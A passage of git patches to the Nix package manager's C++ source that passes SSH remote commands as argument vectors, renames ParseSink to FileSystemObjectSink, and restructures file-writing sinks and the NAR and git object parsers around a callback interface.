RemoteStoreConfig, virtual CommonSSHStoreConfig using RemoteStoreConfig::RemoteStoreConfig; using CommonSSHStoreConfig::CommonSSHStoreConfig; - const Setting remoteProgram{this, "nix-daemon", "remote-program", + const Setting remoteProgram{this, {"nix-daemon"}, "remote-program", "Path to the `nix-daemon` executable on the remote machine."}; const std::string name() override { return "Experimental SSH Store"; } @@ -212,14 +212,15 @@ public: ref SSHStore::openConnection() { auto conn = make_ref(); - - std::string command = remoteProgram + " --stdio"; - if (remoteStore.get() != "") - command += " --store " + shellEscape(remoteStore.get()); - for (auto & arg : extraRemoteProgramArgs) - command += " " + shellEscape(arg); - - conn->sshConn = master.startCommand(command); + Strings command = remoteProgram.get(); + command.push_back("--stdio"); + if (remoteStore.get() != "") { + command.push_back("--store"); + command.push_back(remoteStore.get()); + } + command.insert(command.end(), + extraRemoteProgramArgs.begin(), extraRemoteProgramArgs.end()); + conn->sshConn = master.startCommand(std::move(command)); conn->to = FdSink(conn->sshConn->in.get()); conn->from = FdSource(conn->sshConn->out.get()); return conn; diff --git a/src/libstore/ssh.cc b/src/libstore/ssh.cc index 5c8d6a504..30fe73adb 100644 --- a/src/libstore/ssh.cc +++ b/src/libstore/ssh.cc @@ -52,7 +52,8 @@ bool SSHMaster::isMasterRunning() { return res.first == 0; } -std::unique_ptr SSHMaster::startCommand(const std::string & command) +std::unique_ptr SSHMaster::startCommand( + Strings && command, Strings && extraSshArgs) { Path socketPath = startMaster(); @@ -84,18 +85,19 @@ std::unique_ptr SSHMaster::startCommand(const std::string Strings args; - if (fakeSSH) { - args = { "bash", "-c" }; - } else { + if (!fakeSSH) { args = { "ssh", host.c_str(), "-x" }; addCommonSSHOpts(args); if (socketPath != "") args.insert(args.end(), {"-S", socketPath}); if (verbosity >= lvlChatty) args.push_back("-v"); + 
args.splice(args.end(), std::move(extraSshArgs)); + args.push_back("--"); } - args.push_back(command); + args.splice(args.end(), std::move(command)); + execvp(args.begin()->c_str(), stringsToCharPtrs(args).data()); // could not exec ssh/bash diff --git a/src/libstore/ssh.hh b/src/libstore/ssh.hh index bfcd6f21c..08bb43dfa 100644 --- a/src/libstore/ssh.hh +++ b/src/libstore/ssh.hh @@ -41,7 +41,16 @@ public: AutoCloseFD out, in; }; - std::unique_ptr startCommand(const std::string & command); + /** + * @param command The command (arg vector) to execute. + * + * @param extraSShArgs Extra args to pass to SSH (not the command to + * execute). Will not be used when "fake SSHing" to the local + * machine. + */ + std::unique_ptr startCommand( + Strings && command, + Strings && extraSshArgs = {}); Path startMaster(); }; From 966d6fcd01cfd33e9954e5df262b8bf64a5fd311 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Mon, 22 Jan 2024 17:59:34 -0500 Subject: [PATCH 336/654] `ParseSink` -> `FileSystemObjectSink` Co-authored-by: Robert Hensing --- src/libstore/daemon.cc | 4 ++-- src/libstore/export-import.cc | 2 +- src/libstore/local-store.cc | 2 +- src/libstore/nar-accessor.cc | 2 +- src/libstore/store-api.cc | 8 ++++---- src/libutil/archive.cc | 8 ++++---- src/libutil/archive.hh | 2 +- src/libutil/file-content-address.hh | 2 +- src/libutil/fs-sink.cc | 2 +- src/libutil/fs-sink.hh | 10 +++++----- src/libutil/git.cc | 4 ++-- src/libutil/git.hh | 4 ++-- src/libutil/memory-source-accessor.hh | 2 +- tests/unit/libutil/git.cc | 2 +- 14 files changed, 27 insertions(+), 27 deletions(-) diff --git a/src/libstore/daemon.cc b/src/libstore/daemon.cc index 923ea6447..27ad14ed4 100644 --- a/src/libstore/daemon.cc +++ b/src/libstore/daemon.cc @@ -441,7 +441,7 @@ static void performOp(TunnelLogger * logger, ref store, eagerly consume the entire stream it's given, past the length of the Nar. 
*/ TeeSource savedNARSource(from, saved); - NullParseSink sink; /* just parse the NAR */ + NullFileSystemObjectSink sink; /* just parse the NAR */ parseDump(sink, savedNARSource); } else { /* Incrementally parse the NAR file, stripping the @@ -913,7 +913,7 @@ static void performOp(TunnelLogger * logger, ref store, source = std::make_unique(from, to); else { TeeSource tee { from, saved }; - NullParseSink ether; + NullFileSystemObjectSink ether; parseDump(ether, tee); source = std::make_unique(saved.s); } diff --git a/src/libstore/export-import.cc b/src/libstore/export-import.cc index d57b25bd7..cb36c0c1b 100644 --- a/src/libstore/export-import.cc +++ b/src/libstore/export-import.cc @@ -65,7 +65,7 @@ StorePaths Store::importPaths(Source & source, CheckSigsFlag checkSigs) /* Extract the NAR from the source. */ StringSink saved; TeeSource tee { source, saved }; - NullParseSink ether; + NullFileSystemObjectSink ether; parseDump(ether, tee); uint32_t magic = readInt(source); diff --git a/src/libstore/local-store.cc b/src/libstore/local-store.cc index 07068f8f8..2c22bfe31 100644 --- a/src/libstore/local-store.cc +++ b/src/libstore/local-store.cc @@ -1048,7 +1048,7 @@ void LocalStore::addToStore(const ValidPathInfo & info, Source & source, bool narRead = false; Finally cleanup = [&]() { if (!narRead) { - NullParseSink sink; + NullFileSystemObjectSink sink; try { parseDump(sink, source); } catch (...) 
{ diff --git a/src/libstore/nar-accessor.cc b/src/libstore/nar-accessor.cc index 15b05fe25..4bc68a5ae 100644 --- a/src/libstore/nar-accessor.cc +++ b/src/libstore/nar-accessor.cc @@ -27,7 +27,7 @@ struct NarAccessor : public SourceAccessor NarMember root; - struct NarIndexer : ParseSink, Source + struct NarIndexer : FileSystemObjectSink, Source { NarAccessor & acc; Source & source; diff --git a/src/libstore/store-api.cc b/src/libstore/store-api.cc index c913a97dc..439c9530c 100644 --- a/src/libstore/store-api.cc +++ b/src/libstore/store-api.cc @@ -424,12 +424,12 @@ ValidPathInfo Store::addToStoreSlow( information to narSink. */ TeeSource tapped { *fileSource, narSink }; - NullParseSink blank; + NullFileSystemObjectSink blank; auto & parseSink = method.getFileIngestionMethod() == FileIngestionMethod::Flat - ? (ParseSink &) fileSink + ? (FileSystemObjectSink &) fileSink : method.getFileIngestionMethod() == FileIngestionMethod::Recursive - ? (ParseSink &) blank - : (abort(), (ParseSink &)*(ParseSink *)nullptr); // handled both cases + ? (FileSystemObjectSink &) blank + : (abort(), (FileSystemObjectSink &)*(FileSystemObjectSink *)nullptr); // handled both cases /* The information that flows from tapped (besides being replicated in narSink), is now put in parseSink. 
*/ diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 712ea51c7..17886dd19 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -133,7 +133,7 @@ static SerialisationError badArchive(const std::string & s) } -static void parseContents(ParseSink & sink, Source & source, const Path & path) +static void parseContents(FileSystemObjectSink & sink, Source & source, const Path & path) { uint64_t size = readLongLong(source); @@ -164,7 +164,7 @@ struct CaseInsensitiveCompare }; -static void parse(ParseSink & sink, Source & source, const Path & path) +static void parse(FileSystemObjectSink & sink, Source & source, const Path & path) { std::string s; @@ -266,7 +266,7 @@ static void parse(ParseSink & sink, Source & source, const Path & path) } -void parseDump(ParseSink & sink, Source & source) +void parseDump(FileSystemObjectSink & sink, Source & source) { std::string version; try { @@ -294,7 +294,7 @@ void copyNAR(Source & source, Sink & sink) // FIXME: if 'source' is the output of dumpPath() followed by EOF, // we should just forward all data directly without parsing. 
- NullParseSink parseSink; /* just parse the NAR */ + NullFileSystemObjectSink parseSink; /* just parse the NAR */ TeeSource wrapper { source, sink }; diff --git a/src/libutil/archive.hh b/src/libutil/archive.hh index 2cf8ee891..28c63bb85 100644 --- a/src/libutil/archive.hh +++ b/src/libutil/archive.hh @@ -73,7 +73,7 @@ time_t dumpPathAndGetMtime(const Path & path, Sink & sink, */ void dumpString(std::string_view s, Sink & sink); -void parseDump(ParseSink & sink, Source & source); +void parseDump(FileSystemObjectSink & sink, Source & source); void restorePath(const Path & path, Source & source); diff --git a/src/libutil/file-content-address.hh b/src/libutil/file-content-address.hh index 8e93f5847..7f7544e41 100644 --- a/src/libutil/file-content-address.hh +++ b/src/libutil/file-content-address.hh @@ -35,7 +35,7 @@ void dumpPath( /** * Restore a serialization of the given file system object. * - * @TODO use an arbitrary `ParseSink`. + * @TODO use an arbitrary `FileSystemObjectSink`. */ void restorePath( const Path & path, diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc index 925e6f05d..bf44de92d 100644 --- a/src/libutil/fs-sink.cc +++ b/src/libutil/fs-sink.cc @@ -7,7 +7,7 @@ namespace nix { void copyRecursive( SourceAccessor & accessor, const CanonPath & from, - ParseSink & sink, const Path & to) + FileSystemObjectSink & sink, const Path & to) { auto stat = accessor.lstat(from); diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh index bf54b7301..f4c4e92f1 100644 --- a/src/libutil/fs-sink.hh +++ b/src/libutil/fs-sink.hh @@ -11,7 +11,7 @@ namespace nix { /** * \todo Fix this API, it sucks. 
*/ -struct ParseSink +struct FileSystemObjectSink { virtual void createDirectory(const Path & path) = 0; @@ -33,12 +33,12 @@ struct ParseSink */ void copyRecursive( SourceAccessor & accessor, const CanonPath & sourcePath, - ParseSink & sink, const Path & destPath); + FileSystemObjectSink & sink, const Path & destPath); /** * Ignore everything and do nothing */ -struct NullParseSink : ParseSink +struct NullFileSystemObjectSink : FileSystemObjectSink { void createDirectory(const Path & path) override { } void receiveContents(std::string_view data) override { } @@ -51,7 +51,7 @@ struct NullParseSink : ParseSink /** * Write files at the given path */ -struct RestoreSink : ParseSink +struct RestoreSink : FileSystemObjectSink { Path dstPath; @@ -75,7 +75,7 @@ private: * `receiveContents` to the underlying `Sink`. For anything but a single * file, set `regular = true` so the caller can fail accordingly. */ -struct RegularFileSink : ParseSink +struct RegularFileSink : FileSystemObjectSink { bool regular = true; Sink & sink; diff --git a/src/libutil/git.cc b/src/libutil/git.cc index 296b75628..058384db0 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -54,7 +54,7 @@ static std::string getString(Source & source, int n) void parse( - ParseSink & sink, + FileSystemObjectSink & sink, const Path & sinkPath, Source & source, std::function hook, @@ -133,7 +133,7 @@ std::optional convertMode(SourceAccessor::Type type) } -void restore(ParseSink & sink, Source & source, std::function hook) +void restore(FileSystemObjectSink & sink, Source & source, std::function hook) { parse(sink, "", source, [&](Path name, TreeEntry entry) { auto [accessor, from] = hook(entry.hash); diff --git a/src/libutil/git.hh b/src/libutil/git.hh index b24b25dd3..e2fe20509 100644 --- a/src/libutil/git.hh +++ b/src/libutil/git.hh @@ -60,7 +60,7 @@ using Tree = std::map; using SinkHook = void(const Path & name, TreeEntry entry); void parse( - ParseSink & sink, const Path & sinkPath, + 
FileSystemObjectSink & sink, const Path & sinkPath, Source & source, std::function hook, const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); @@ -81,7 +81,7 @@ using RestoreHook = std::pair(Hash); /** * Wrapper around `parse` and `RestoreSink` */ -void restore(ParseSink & sink, Source & source, std::function hook); +void restore(FileSystemObjectSink & sink, Source & source, std::function hook); /** * Dumps a single file to a sink diff --git a/src/libutil/memory-source-accessor.hh b/src/libutil/memory-source-accessor.hh index b908f3713..b46c61e54 100644 --- a/src/libutil/memory-source-accessor.hh +++ b/src/libutil/memory-source-accessor.hh @@ -75,7 +75,7 @@ struct MemorySourceAccessor : virtual SourceAccessor /** * Write to a `MemorySourceAccessor` at the given path */ -struct MemorySink : ParseSink +struct MemorySink : FileSystemObjectSink { MemorySourceAccessor & dst; diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc index 141a55816..6bbcd161b 100644 --- a/tests/unit/libutil/git.cc +++ b/tests/unit/libutil/git.cc @@ -119,7 +119,7 @@ const static Tree tree = { TEST_F(GitTest, tree_read) { readTest("tree.bin", [&](const auto & encoded) { StringSource in { encoded }; - NullParseSink out; + NullFileSystemObjectSink out; Tree got; parse(out, "", in, [&](auto & name, auto entry) { auto name2 = name; From 6365bbfa8120007719156b45482568aca6c74f26 Mon Sep 17 00:00:00 2001 From: John Ericson Date: Wed, 20 Dec 2023 14:47:05 -0500 Subject: [PATCH 337/654] Improve the `FileSystemObjectSink` interface More invariants are enforced in the type, and less state needs to be stored in the main sink itself. The method here is roughly that known as "session types". 
Co-authored-by: Robert Hensing --- src/libstore/nar-accessor.cc | 60 +++++++---- src/libutil/archive.cc | 144 ++++++++++++++------------ src/libutil/fs-sink.cc | 72 +++++++++---- src/libutil/fs-sink.hh | 61 ++++++----- src/libutil/git.cc | 130 +++++++++++++++-------- src/libutil/git.hh | 34 +++++- src/libutil/memory-source-accessor.cc | 39 ++++--- src/libutil/memory-source-accessor.hh | 12 +-- tests/unit/libutil/git.cc | 24 +++-- 9 files changed, 357 insertions(+), 219 deletions(-) diff --git a/src/libstore/nar-accessor.cc b/src/libstore/nar-accessor.cc index 4bc68a5ae..b13e4c52c 100644 --- a/src/libstore/nar-accessor.cc +++ b/src/libstore/nar-accessor.cc @@ -19,6 +19,35 @@ struct NarMember std::map children; }; +struct NarMemberConstructor : CreateRegularFileSink +{ +private: + + NarMember & narMember; + + uint64_t & pos; + +public: + + NarMemberConstructor(NarMember & nm, uint64_t & pos) + : narMember(nm), pos(pos) + { } + + void isExecutable() override + { + narMember.stat.isExecutable = true; + } + + void preallocateContents(uint64_t size) override + { + narMember.stat.fileSize = size; + narMember.stat.narOffset = pos; + } + + void operator () (std::string_view data) override + { } +}; + struct NarAccessor : public SourceAccessor { std::optional nar; @@ -42,7 +71,7 @@ struct NarAccessor : public SourceAccessor : acc(acc), source(source) { } - void createMember(const Path & path, NarMember member) + NarMember & createMember(const Path & path, NarMember member) { size_t level = std::count(path.begin(), path.end(), '/'); while (parents.size() > level) parents.pop(); @@ -50,11 +79,14 @@ struct NarAccessor : public SourceAccessor if (parents.empty()) { acc.root = std::move(member); parents.push(&acc.root); + return acc.root; } else { if (parents.top()->stat.type != Type::tDirectory) throw Error("NAR file missing parent directory of path '%s'", path); auto result = parents.top()->children.emplace(baseNameOf(path), std::move(member)); - 
parents.push(&result.first->second); + auto & ref = result.first->second; + parents.push(&ref); + return ref; } } @@ -68,34 +100,18 @@ struct NarAccessor : public SourceAccessor } }); } - void createRegularFile(const Path & path) override + void createRegularFile(const Path & path, std::function func) override { - createMember(path, NarMember{ .stat = { + auto & nm = createMember(path, NarMember{ .stat = { .type = Type::tRegular, .fileSize = 0, .isExecutable = false, .narOffset = 0 } }); + NarMemberConstructor nmc { nm, pos }; + func(nmc); } - void closeRegularFile() override - { } - - void isExecutable() override - { - parents.top()->stat.isExecutable = true; - } - - void preallocateContents(uint64_t size) override - { - auto & st = parents.top()->stat; - st.fileSize = size; - st.narOffset = pos; - } - - void receiveContents(std::string_view data) override - { } - void createSymlink(const Path & path, const std::string & target) override { createMember(path, diff --git a/src/libutil/archive.cc b/src/libutil/archive.cc index 17886dd19..6062392cd 100644 --- a/src/libutil/archive.cc +++ b/src/libutil/archive.cc @@ -133,7 +133,7 @@ static SerialisationError badArchive(const std::string & s) } -static void parseContents(FileSystemObjectSink & sink, Source & source, const Path & path) +static void parseContents(CreateRegularFileSink & sink, Source & source) { uint64_t size = readLongLong(source); @@ -147,7 +147,7 @@ static void parseContents(FileSystemObjectSink & sink, Source & source, const Pa auto n = buf.size(); if ((uint64_t)n > left) n = left; source(buf.data(), n); - sink.receiveContents({buf.data(), n}); + sink({buf.data(), n}); left -= n; } @@ -171,95 +171,107 @@ static void parse(FileSystemObjectSink & sink, Source & source, const Path & pat s = readString(source); if (s != "(") throw badArchive("expected open tag"); - enum { tpUnknown, tpRegular, tpDirectory, tpSymlink } type = tpUnknown; - std::map names; - while (1) { + auto getString = [&]() { 
checkInterrupt(); + return readString(source); + }; - s = readString(source); + // For first iteration + s = getString(); + + while (1) { if (s == ")") { break; } else if (s == "type") { - if (type != tpUnknown) - throw badArchive("multiple type fields"); - std::string t = readString(source); + std::string t = getString(); if (t == "regular") { - type = tpRegular; - sink.createRegularFile(path); + sink.createRegularFile(path, [&](auto & crf) { + while (1) { + s = getString(); + + if (s == "contents") { + parseContents(crf, source); + } + + else if (s == "executable") { + auto s2 = getString(); + if (s2 != "") throw badArchive("executable marker has non-empty value"); + crf.isExecutable(); + } + + else break; + } + }); } else if (t == "directory") { sink.createDirectory(path); - type = tpDirectory; + + while (1) { + s = getString(); + + if (s == "entry") { + std::string name, prevName; + + s = getString(); + if (s != "(") throw badArchive("expected open tag"); + + while (1) { + s = getString(); + + if (s == ")") { + break; + } else if (s == "name") { + name = getString(); + if (name.empty() || name == "." || name == ".." 
|| name.find('/') != std::string::npos || name.find((char) 0) != std::string::npos) + throw Error("NAR contains invalid file name '%1%'", name); + if (name <= prevName) + throw Error("NAR directory is not sorted"); + prevName = name; + if (archiveSettings.useCaseHack) { + auto i = names.find(name); + if (i != names.end()) { + debug("case collision between '%1%' and '%2%'", i->first, name); + name += caseHackSuffix; + name += std::to_string(++i->second); + } else + names[name] = 0; + } + } else if (s == "node") { + if (name.empty()) throw badArchive("entry name missing"); + parse(sink, source, path + "/" + name); + } else + throw badArchive("unknown field " + s); + } + } + + else break; + } } else if (t == "symlink") { - type = tpSymlink; + s = getString(); + + if (s != "target") + throw badArchive("expected 'target' got " + s); + + std::string target = getString(); + sink.createSymlink(path, target); + + // for the next iteration + s = getString(); } else throw badArchive("unknown file type " + t); } - else if (s == "contents" && type == tpRegular) { - parseContents(sink, source, path); - sink.closeRegularFile(); - } - - else if (s == "executable" && type == tpRegular) { - auto s = readString(source); - if (s != "") throw badArchive("executable marker has non-empty value"); - sink.isExecutable(); - } - - else if (s == "entry" && type == tpDirectory) { - std::string name, prevName; - - s = readString(source); - if (s != "(") throw badArchive("expected open tag"); - - while (1) { - checkInterrupt(); - - s = readString(source); - - if (s == ")") { - break; - } else if (s == "name") { - name = readString(source); - if (name.empty() || name == "." || name == ".." 
|| name.find('/') != std::string::npos || name.find((char) 0) != std::string::npos) - throw Error("NAR contains invalid file name '%1%'", name); - if (name <= prevName) - throw Error("NAR directory is not sorted"); - prevName = name; - if (archiveSettings.useCaseHack) { - auto i = names.find(name); - if (i != names.end()) { - debug("case collision between '%1%' and '%2%'", i->first, name); - name += caseHackSuffix; - name += std::to_string(++i->second); - } else - names[name] = 0; - } - } else if (s == "node") { - if (name.empty()) throw badArchive("entry name missing"); - parse(sink, source, path + "/" + name); - } else - throw badArchive("unknown field " + s); - } - } - - else if (s == "target" && type == tpSymlink) { - std::string target = readString(source); - sink.createSymlink(path, target); - } - else throw badArchive("unknown field " + s); } diff --git a/src/libutil/fs-sink.cc b/src/libutil/fs-sink.cc index bf44de92d..b6f8db592 100644 --- a/src/libutil/fs-sink.cc +++ b/src/libutil/fs-sink.cc @@ -19,16 +19,12 @@ void copyRecursive( case SourceAccessor::tRegular: { - sink.createRegularFile(to); - if (stat.isExecutable) - sink.isExecutable(); - LambdaSink sink2 { - [&](auto d) { - sink.receiveContents(d); - } - }; - accessor.readFile(from, sink2, [&](uint64_t size) { - sink.preallocateContents(size); + sink.createRegularFile(to, [&](CreateRegularFileSink & crf) { + if (stat.isExecutable) + crf.isExecutable(); + accessor.readFile(from, crf, [&](uint64_t size) { + crf.preallocateContents(size); + }); }); break; } @@ -71,20 +67,24 @@ void RestoreSink::createDirectory(const Path & path) throw SysError("creating directory '%1%'", p); }; -void RestoreSink::createRegularFile(const Path & path) +struct RestoreRegularFile : CreateRegularFileSink { + AutoCloseFD fd; + + void operator () (std::string_view data) override; + void isExecutable() override; + void preallocateContents(uint64_t size) override; +}; + +void RestoreSink::createRegularFile(const Path & path, 
std::function func) { Path p = dstPath + path; - fd = open(p.c_str(), O_CREAT | O_EXCL | O_WRONLY | O_CLOEXEC, 0666); - if (!fd) throw SysError("creating file '%1%'", p); + RestoreRegularFile crf; + crf.fd = open(p.c_str(), O_CREAT | O_EXCL | O_WRONLY | O_CLOEXEC, 0666); + if (!crf.fd) throw SysError("creating file '%1%'", p); + func(crf); } -void RestoreSink::closeRegularFile() -{ - /* Call close explicitly to make sure the error is checked */ - fd.close(); -} - -void RestoreSink::isExecutable() +void RestoreRegularFile::isExecutable() { struct stat st; if (fstat(fd.get(), &st) == -1) @@ -93,7 +93,7 @@ void RestoreSink::isExecutable() throw SysError("fchmod"); } -void RestoreSink::preallocateContents(uint64_t len) +void RestoreRegularFile::preallocateContents(uint64_t len) { if (!restoreSinkSettings.preallocateContents) return; @@ -111,7 +111,7 @@ void RestoreSink::preallocateContents(uint64_t len) #endif } -void RestoreSink::receiveContents(std::string_view data) +void RestoreRegularFile::operator () (std::string_view data) { writeFull(fd.get(), data); } @@ -122,4 +122,32 @@ void RestoreSink::createSymlink(const Path & path, const std::string & target) nix::createSymlink(target, p); } + +void RegularFileSink::createRegularFile(const Path & path, std::function func) +{ + struct CRF : CreateRegularFileSink { + RegularFileSink & back; + CRF(RegularFileSink & back) : back(back) {} + void operator () (std::string_view data) override + { + back.sink(data); + } + void isExecutable() override {} + } crf { *this }; + func(crf); +} + + +void NullFileSystemObjectSink::createRegularFile(const Path & path, std::function func) +{ + struct : CreateRegularFileSink { + void operator () (std::string_view data) override {} + void isExecutable() override {} + } crf; + // Even though `NullFileSystemObjectSink` doesn't do anything, it's important + // that we call the function, to e.g. advance the parser using this + // sink. 
+ func(crf); +} + } diff --git a/src/libutil/fs-sink.hh b/src/libutil/fs-sink.hh index f4c4e92f1..4dfb5b329 100644 --- a/src/libutil/fs-sink.hh +++ b/src/libutil/fs-sink.hh @@ -9,18 +9,13 @@ namespace nix { /** - * \todo Fix this API, it sucks. + * Actions on an open regular file in the process of creating it. + * + * See `FileSystemObjectSink::createRegularFile`. */ -struct FileSystemObjectSink +struct CreateRegularFileSink : Sink { - virtual void createDirectory(const Path & path) = 0; - - virtual void createRegularFile(const Path & path) = 0; - virtual void receiveContents(std::string_view data) = 0; virtual void isExecutable() = 0; - virtual void closeRegularFile() = 0; - - virtual void createSymlink(const Path & path, const std::string & target) = 0; /** * An optimization. By default, do nothing. @@ -28,8 +23,24 @@ struct FileSystemObjectSink virtual void preallocateContents(uint64_t size) { }; }; + +struct FileSystemObjectSink +{ + virtual void createDirectory(const Path & path) = 0; + + /** + * This function in general is no re-entrant. Only one file can be + * written at a time. + */ + virtual void createRegularFile( + const Path & path, + std::function) = 0; + + virtual void createSymlink(const Path & path, const std::string & target) = 0; +}; + /** - * Recusively copy file system objects from the source into the sink. + * Recursively copy file system objects from the source into the sink. 
*/ void copyRecursive( SourceAccessor & accessor, const CanonPath & sourcePath, @@ -41,11 +52,10 @@ void copyRecursive( struct NullFileSystemObjectSink : FileSystemObjectSink { void createDirectory(const Path & path) override { } - void receiveContents(std::string_view data) override { } void createSymlink(const Path & path, const std::string & target) override { } - void createRegularFile(const Path & path) override { } - void closeRegularFile() override { } - void isExecutable() override { } + void createRegularFile( + const Path & path, + std::function) override; }; /** @@ -57,17 +67,11 @@ struct RestoreSink : FileSystemObjectSink void createDirectory(const Path & path) override; - void createRegularFile(const Path & path) override; - void receiveContents(std::string_view data) override; - void isExecutable() override; - void closeRegularFile() override; + void createRegularFile( + const Path & path, + std::function) override; void createSymlink(const Path & path, const std::string & target) override; - - void preallocateContents(uint64_t size) override; - -private: - AutoCloseFD fd; }; /** @@ -87,19 +91,14 @@ struct RegularFileSink : FileSystemObjectSink regular = false; } - void receiveContents(std::string_view data) override - { - sink(data); - } - void createSymlink(const Path & path, const std::string & target) override { regular = false; } - void createRegularFile(const Path & path) override { } - void closeRegularFile() override { } - void isExecutable() override { } + void createRegularFile( + const Path & path, + std::function) override; }; } diff --git a/src/libutil/git.cc b/src/libutil/git.cc index 058384db0..3b8c3ebac 100644 --- a/src/libutil/git.cc +++ b/src/libutil/git.cc @@ -52,24 +52,22 @@ static std::string getString(Source & source, int n) return v; } - -void parse( +void parseBlob( FileSystemObjectSink & sink, const Path & sinkPath, Source & source, - std::function hook, + bool executable, const ExperimentalFeatureSettings & xpSettings) { 
xpSettings.require(Xp::GitHashing); - auto type = getString(source, 5); - - if (type == "blob ") { - sink.createRegularFile(sinkPath); + sink.createRegularFile(sinkPath, [&](auto & crf) { + if (executable) + crf.isExecutable(); unsigned long long size = std::stoi(getStringUntil(source, 0)); - sink.preallocateContents(size); + crf.preallocateContents(size); unsigned long long left = size; std::string buf; @@ -79,47 +77,91 @@ void parse( checkInterrupt(); buf.resize(std::min((unsigned long long)buf.capacity(), left)); source(buf); - sink.receiveContents(buf); + crf(buf); left -= buf.size(); } + }); +} + +void parseTree( + FileSystemObjectSink & sink, + const Path & sinkPath, + Source & source, + std::function hook, + const ExperimentalFeatureSettings & xpSettings) +{ + unsigned long long size = std::stoi(getStringUntil(source, 0)); + unsigned long long left = size; + + sink.createDirectory(sinkPath); + + while (left) { + std::string perms = getStringUntil(source, ' '); + left -= perms.size(); + left -= 1; + + RawMode rawMode = std::stoi(perms, 0, 8); + auto modeOpt = decodeMode(rawMode); + if (!modeOpt) + throw Error("Unknown Git permission: %o", perms); + auto mode = std::move(*modeOpt); + + std::string name = getStringUntil(source, '\0'); + left -= name.size(); + left -= 1; + + std::string hashs = getString(source, 20); + left -= 20; + + Hash hash(HashAlgorithm::SHA1); + std::copy(hashs.begin(), hashs.end(), hash.hash); + + hook(name, TreeEntry { + .mode = mode, + .hash = hash, + }); + } +} + +ObjectType parseObjectType( + Source & source, + const ExperimentalFeatureSettings & xpSettings) +{ + xpSettings.require(Xp::GitHashing); + + auto type = getString(source, 5); + + if (type == "blob ") { + return ObjectType::Blob; } else if (type == "tree ") { - unsigned long long size = std::stoi(getStringUntil(source, 0)); - unsigned long long left = size; - - sink.createDirectory(sinkPath); - - while (left) { - std::string perms = getStringUntil(source, ' '); - left -= 
perms.size(); - left -= 1; - - RawMode rawMode = std::stoi(perms, 0, 8); - auto modeOpt = decodeMode(rawMode); - if (!modeOpt) - throw Error("Unknown Git permission: %o", perms); - auto mode = std::move(*modeOpt); - - std::string name = getStringUntil(source, '\0'); - left -= name.size(); - left -= 1; - - std::string hashs = getString(source, 20); - left -= 20; - - Hash hash(HashAlgorithm::SHA1); - std::copy(hashs.begin(), hashs.end(), hash.hash); - - hook(name, TreeEntry { - .mode = mode, - .hash = hash, - }); - - if (mode == Mode::Executable) - sink.isExecutable(); - } + return ObjectType::Tree; } else throw Error("input doesn't look like a Git object"); } +void parse( + FileSystemObjectSink & sink, + const Path & sinkPath, + Source & source, + bool executable, + std::function hook, + const ExperimentalFeatureSettings & xpSettings) +{ + xpSettings.require(Xp::GitHashing); + + auto type = parseObjectType(source, xpSettings); + + switch (type) { + case ObjectType::Blob: + parseBlob(sink, sinkPath, source, executable, xpSettings); + break; + case ObjectType::Tree: + parseTree(sink, sinkPath, source, hook, xpSettings); + break; + default: + assert(false); + }; +} + std::optional convertMode(SourceAccessor::Type type) { @@ -135,7 +177,7 @@ std::optional convertMode(SourceAccessor::Type type) void restore(FileSystemObjectSink & sink, Source & source, std::function hook) { - parse(sink, "", source, [&](Path name, TreeEntry entry) { + parse(sink, "", source, false, [&](Path name, TreeEntry entry) { auto [accessor, from] = hook(entry.hash); auto stat = accessor->lstat(from); auto gotOpt = convertMode(stat.type); diff --git a/src/libutil/git.hh b/src/libutil/git.hh index e2fe20509..d9eb138e1 100644 --- a/src/libutil/git.hh +++ b/src/libutil/git.hh @@ -13,12 +13,19 @@ namespace nix::git { +enum struct ObjectType { + Blob, + Tree, + //Commit, + //Tag, +}; + using RawMode = uint32_t; enum struct Mode : RawMode { Directory = 0040000, - Executable = 0100755, Regular = 0100644, 
+ Executable = 0100755, Symlink = 0120000, }; @@ -59,9 +66,34 @@ using Tree = std::map; */ using SinkHook = void(const Path & name, TreeEntry entry); +/** + * Parse the "blob " or "tree " prefix. + * + * @throws if prefix not recognized + */ +ObjectType parseObjectType( + Source & source, + const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); + +void parseBlob( + FileSystemObjectSink & sink, const Path & sinkPath, + Source & source, + bool executable, + const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); + +void parseTree( + FileSystemObjectSink & sink, const Path & sinkPath, + Source & source, + std::function hook, + const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); + +/** + * Helper putting the previous three `parse*` functions together. + */ void parse( FileSystemObjectSink & sink, const Path & sinkPath, Source & source, + bool executable, std::function hook, const ExperimentalFeatureSettings & xpSettings = experimentalFeatureSettings); diff --git a/src/libutil/memory-source-accessor.cc b/src/libutil/memory-source-accessor.cc index 78a4dd298..880fa61b7 100644 --- a/src/libutil/memory-source-accessor.cc +++ b/src/libutil/memory-source-accessor.cc @@ -134,36 +134,43 @@ void MemorySink::createDirectory(const Path & path) throw Error("file '%s' is not a directory", path); }; -void MemorySink::createRegularFile(const Path & path) +struct CreateMemoryRegularFile : CreateRegularFileSink { + File::Regular & regularFile; + + CreateMemoryRegularFile(File::Regular & r) + : regularFile(r) + { } + + void operator () (std::string_view data) override; + void isExecutable() override; + void preallocateContents(uint64_t size) override; +}; + +void MemorySink::createRegularFile(const Path & path, std::function func) { auto * f = dst.open(CanonPath{path}, File { File::Regular {} }); if (!f) throw Error("file '%s' cannot be made because some parent file is not a directory", path); - if (!(r = 
